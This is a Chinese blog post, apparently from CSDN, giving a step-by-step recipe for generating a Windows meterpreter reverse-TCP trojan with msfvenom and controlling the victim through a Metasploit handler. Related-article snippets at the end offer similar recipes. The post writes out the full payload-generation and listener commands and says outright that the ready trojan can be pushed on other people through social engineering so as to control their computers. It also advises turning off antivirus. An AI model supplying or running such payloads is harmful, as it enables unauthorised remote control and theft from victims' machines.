msfvenom生成远程木马控制电脑

已于 2023-12-07 23:41:05 修改
阅读量662 收藏 7
点赞数 1
分类专栏: kali 木马 文章标签: linux
于 2023-12-07 23:36:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48886225/article/details/134837763
版权
本文介绍了如何在KaliLinux中通过msfvenom生成针对Windows系统的木马,使用msfconsole进行配置,设置LHOST和LPORT,最终实现对目标机器的控制。
摘要由CSDN通过智能技术生成

一、进入root模式

sudo -i

输入kali密码,密码不显示,输完回车即可

二、生成木马

命令格式为msfvenom -p [payload] LHOST=[IP地址] LPORT=[端口号] -f [格式] -o [文件名]

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.30.133 LPORT=10000 -f exe -o 2.exe

其中windosw这里是系统类型,想生成什么系统的木马就写什么系统,例如linux、osx(苹果)、android(安卓),我这里以本机win10系统为例

三、开启msf

msfconsole

四、配置

1.使用模块

use exploit/multi/handler

2.查看配置

show options

3.更改配置

把这里的payload改为生成木马时的payload

set payload windows/x64/meterpreter_reverse_tcp

更改LHOST和LPORT

set LHOST
set LPORT

地址和端口为生成木马时所使用的

4.运行

run

出现上图则说明运行成功,现在木马已经准备就绪,可以通过社工等方式让别人上钩,从而控制电脑

5.举例

现在我以本机为例,首先要关闭杀毒软件或者把木马文件放到隔离区,然后把刚才生成好的木马2.exe运行后,本机没有异常,攻击机这边显示已经上钩

得到这个界面就说明已经获取了metepreter,可以通过help命令来查看可以进行的操作

学安全的小白
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
msfvenom生成木马攻击windows
afei001
03-25 1253
实验环境 攻击机:kali     IP:192.168.43.5 靶机:windows 生成木马攻击windows 1.在kali上生成反弹木马 root@afei:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.5 lport=55555 -f exe > test.exe [-] No pla...
使用kali渗透工具msfvenom生成远控木马
m0_74981852的博客
06-04 2735
在杀毒软件中可以找回文件并信任改文件。右键复制到自己的电脑的一个位置,注意。1.打开kali终端>输入。2.1查看生成的后门文件。6.对目标主机进行攻击。运行之后,去目标主机。
msfmsfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3960
msfvenom的使用
MSF详解及常用命令之利用msf控制目标电脑
世间繁华梦一出
12-21 2583
MSF基本操作详解序言:MSF简介1、模块介绍2、基本命令3、后渗透4、msfvenom生成后门木马 ** 序言:MSF简介 Metasploit简称msf,Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 ** 1、模块介绍 它是一个渗透测试框架(模块介绍) auxi
msfvenom生成远控木马
最新发布
Leiyinghui的博客
06-26 933
用于生成各种类型的恶意软件payload,可以生成针对不同操作系统和应用程序的恶意代码,如木马、后门、恶意软件等,msfvenom在目标机上执行后门,在本地监听上线。查看可执行的操作,根据描述内容选择所需的命令进行操作。
使用msfvenom实现远程控制.
2301_78457119的博客
06-24 738
在Kali 2中生成被控端的工具:msfvenommsfvenom是渗透测试工具Metasploit中的一个命令)1、查看帮助信息、查2.看所有可以使用的攻击模块3、筛选出使用reverse_tcp的模块。
msfvenom生成远控后门木马
2303_76389797的博客
04-18 346
这三个指令实在msf夺取了目标机的终端后才可以执行的,screenshot的意思是对目标机进行截图并且保存到本机,run vnc则是可以对目标机进行实时监控,hashdump是获取目标机的密码,不过要说的是,这时候获取的密码为Windows中经过ntml加密的密文,需要进行破译才可获取明文密码。这里设置的是payload以及本机的host和port,注意这里设置的一定要与上面生成木马的时候保持一致。这一句就是开始进行监听,如果有目标机点击了你的木马程序这里的终端会自动切换成目标机的终端。
利用msf控制目标电脑
m0_52923241的博客
04-08 720
利用永恒之蓝漏洞攻击win7准备工作永恒之蓝漏洞msf简介攻击步骤 准备工作 kali Linux虚拟机一台 win7虚拟机一台(注意关闭防火墙) 永恒之蓝漏洞 简介:永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内
[可行]setoolkit生成木马软件远程控制实例
weixin_33901641的博客
02-12 804
查看原文 选1,social-ensineering attacks 选4,create a payload and listener 选2,Windows Reverse_TCP Meterpreter LHOST 192.168.1.92 PORT 443 得到~/.set/payload.exe 想办法让目标运行payload 回车开始监控。 meterpreter得到,可以使用以下...
使用msfvenom生成被控端并进行远程控制
Z_3679的博客
07-01 408
使用-p使用LHOST和LPORT选项指定攻击者的IP地址和端口使用-fexeapkphpraw使用-o选项指定输出文件的路径和名称使用RHOST和RPORT选项指定目标的IP地址和端口其他选项根据不同payload类型而有所不同使用-e使用--list选项列出可用的payload、编码器、nop等模块使用--help选项获取帮助信息使用-n选项关闭payload的后门。
谨防钓鱼(二)——msf搭档shellter轻松控制目标电脑
tempulcc的博客
09-15 378
metaspolit配合shellter渗透windows
白金远控+生成
06-11
白金远控破解版 远程控制 内带生成
牧民远控正式版服务端生成
12-24
牧民远控正式版服务端生成器牧民远控正式版服务端生成器 牧民远控正式版服务端生成
【web安全个人自学笔记】使用kali渗透工具生成远控木马
2301_78959801的博客
09-17 532
使用kali渗透工具生成远控木马
使用MSFPC远程控制
y3174445239的博客
06-24 586
切换为root用户之后,可以对安卓机进行最大权限的控制,比如关闭selinux、读取文件等。按目标系统分:Windows、Androd、iOS、各种版本的Linux操作系统。Netcat工具的使用:(以Metasploitable 2的80端口为例进行测试)2、输入shell,执行各种命令,如查看操作系统信息、切换到root用户等。按连接方式分:正向、反向(注意:现在大都采用反向远程控制方式)5、打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。(2)在安卓虚拟机中弹出提示信息,选择“允许”。
MSF基本使用和控制台命令
分享学习网络的点点滴滴
12-26 945
Msfconsole使用接口○ 最流行的用户接口○ 几乎可以使用全部MSF功能○ 控制台命令支持TAB自动补全○ 支持外部命令的执行(系统命令等)○ 点击鼠标启动 / msfconsole -h -q -r -v / exit○ help /?
【kali】生成木马并绑定正常软件实现远控
qq_20410657的博客
10-20 872
如果没有则需要进行安装。
[远程控制]木马伪装:图片
不忘初心,护天下安全!
07-28 4249
前言 坦言道,自己在最近的渗透之路碰了很多次壁,钓鱼大神们让我羡慕不已。而钓鱼的弹药里面必不可少的就是木马了,最近都在流行快捷方式马(lnk马),这次就不多介绍,从最简单的图片马伪装给大家介绍。 伪装,改变不了被杀,只是改改面目而已。友情提醒,如果不会免杀,那就只是徒增笑资罢了。 伪装进行时 这次介绍的工具为BD2 Net Injector,百度下载即可,要注意后门哈。 首先,我们准备如下: 准备好的可执行文件(核心文件); 确定伪装的后缀; 用于伪装的图片; 图片未打开时的缩略ico文件
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值